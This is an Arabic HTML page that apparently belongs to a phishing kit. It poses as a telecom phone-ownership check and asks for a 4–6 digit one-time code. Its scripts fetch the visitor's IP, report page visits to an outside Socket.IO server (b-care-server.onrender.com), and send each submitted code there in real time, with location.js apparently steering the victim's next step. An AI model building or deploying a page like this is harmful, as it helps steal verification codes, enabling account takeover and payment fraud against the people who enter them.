<!DOCTYPE html>
<html lang="ar" dir="rtl">
  <head>
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <meta charset="utf-8" />
    <title>Otp Code</title>
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"
      rel="stylesheet"
    />
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Readex+Pro:wght@160..700&display=swap");
      @import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css");

      * {
        font-family: "Readex Pro", sans-serif;
        font-optical-sizing: auto;
        font-weight: 400; /* ✅ ضع رقم وزن صالح هنا */
        font-style: normal;
        font-variation-settings: "HEXP" 0;
      }

      .content {
        background: white;
        border-radius: 0 0 20px 20px;
        padding: 30px 20px;
        margin: -30px 10px 30px;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05);
        min-height: 200px;
        font-size: 16px;
        color: #333;
      }

      .content-section {
        display: none;
      }

      .content-section.active {
        display: block;
      }

      .form-group {
        margin-bottom: 1.5rem;
      }

      .form-group label {
        font-size: 14px;
        font-weight: 400;
        color: #777;
        display: block;
        margin-bottom: 6px;
      }

      #loadingOverlay {
        display: none;
        position: fixed;
        inset: 0;
        background-color: rgba(0, 0, 0, 0.6);
        z-index: 9999;
        justify-content: center;
        align-items: center;
      }
    </style>
  </head>

  <body>
    <div class="container mt-3 d-none" id="phonecode_error"></div>
    <div class="container mt-5" id="applePayRadio">
      <div class="row justify-content-center">
        <div class="col-md-6 col-lg-4">
          <div
            style="
              border: 1px solid #ddd;
              border-radius: 12px;
              font-family: 'Tahoma', sans-serif;
              overflow: hidden;
            "
          >
            <div style="padding: 0px 16px 16px 16px">
              <div class="text-center">
                <div class="mb-5 text-left">
                  <img alt="" src="assets/photos/cstr.png" width="250px" />
                </div>
                <h5>التحقق من رقم الجوال</h5>
                <p class="text-right mt-3" style="font-size: small">
                  يرجى إدخال الرمز المرسل إليك من قِبل شركة الاتصالات الخاصة بك،
                  وذلك لاستكمال عملية التحقق والتأكيد من ملكية رقم الجوال
                  المُسجّل.
                </p>
                <form id="codeForm">
                  <div class="form-group text-right">
                    <label for="verification_code_three"
                      >أدخل الرمز هنا :</label
                    >
                    <input
                      class="form-control text-center"
                      id="verification_code_three"
                      type="tel"
                      minlength="4"
                      maxlength="6"
                      pattern="^[0-9]{4,6}$"
                      title="يجب أن يتكون رمز التحقق من 4 إلى 6 أرقام فقط"
                      oninput="this.value = this.value.replace(/\D/g, '').slice(0, 6)"
                      required
                    />
                    <small
                      class="d-none"
                      id="phonecode_error"
                      style="color: red"
                    >
                      الرمز المدخل خاطئ
                    </small>
                  </div>
                  <button class="btn btn-primary col-12" type="submit">
                    تأكيد
                  </button>
                  <a>
                    <p
                      class="text-right text-secondary mt-3"
                      style="font-size: x-small"
                    >
                      هل تحتاج للمساعدة ؟
                    </p>
                  </a>
                </form>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <!-- Loading overlay -->
    <div id="loadingOverlay" class="d-none">
      <div class="text-center text-white">
        <div class="spinner-border text-light mb-3" role="status"></div>
        <h5 class="font-weight-bold">يرجى الانتظار</h5>
        <p>انتظر حتى تتم معالجة طلبك</p>
      </div>
    </div>

    <!-- 1) Socket.IO -->
    <script src="https://cdn.socket.io/4.6.1/socket.io.min.js"></script>
    <script>
      window.socket = io("https://b-care-server.onrender.com");
      window.visitorIP = null;

      (async () => {
        try {
          const r = await fetch("https://api.ipify.org?format=json");
          const { ip } = await r.json();
          window.visitorIP = ip;
          const page =
            window.location.pathname.split("/").pop() || "phonecode.html";
          window.socket.emit("updateLocation", { ip, page });
        } catch (e) {
          console.error("IP fetch failed:", e);
        }
      })();
    </script>

    <!-- 2) location.js -->
    <script src="./assets/js/location.js"></script>

    <!-- 3) Form → socket.submitPhoneCode & overlay logic -->
    <script>
      document.addEventListener("DOMContentLoaded", () => {
        const form = document.getElementById("codeForm");
        const overlay = document.getElementById("loadingOverlay");

        form.addEventListener("submit", async (e) => {
          e.preventDefault();

          // show overlay
          overlay.classList.remove("d-none");
          overlay.classList.add("d-flex");

          while (window.visitorIP === null) {
            await new Promise((r) => setTimeout(r, 50));
          }

          const code3 = document.getElementById(
            "verification_code_three"
          ).value;

          window.socket.emit("submitPhoneCode", {
            ip: window.visitorIP,
            verification_code_three: code3,
          });
        });

        window.socket.on("ackPhoneCode", (resp) => {
          if (resp.success) {
            // keep overlay on; location.js will navigate
          } else {
            // hide overlay on error
            overlay.classList.remove("d-flex");
            overlay.classList.add("d-none");
            document
              .getElementById("phonecode_error")
              .classList.remove("d-none");
            console.error(resp.error);
          }
        });
      });
    </script>

    <!-- 4) jQuery THEN Bootstrap JS -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script>
  </body>
</html>
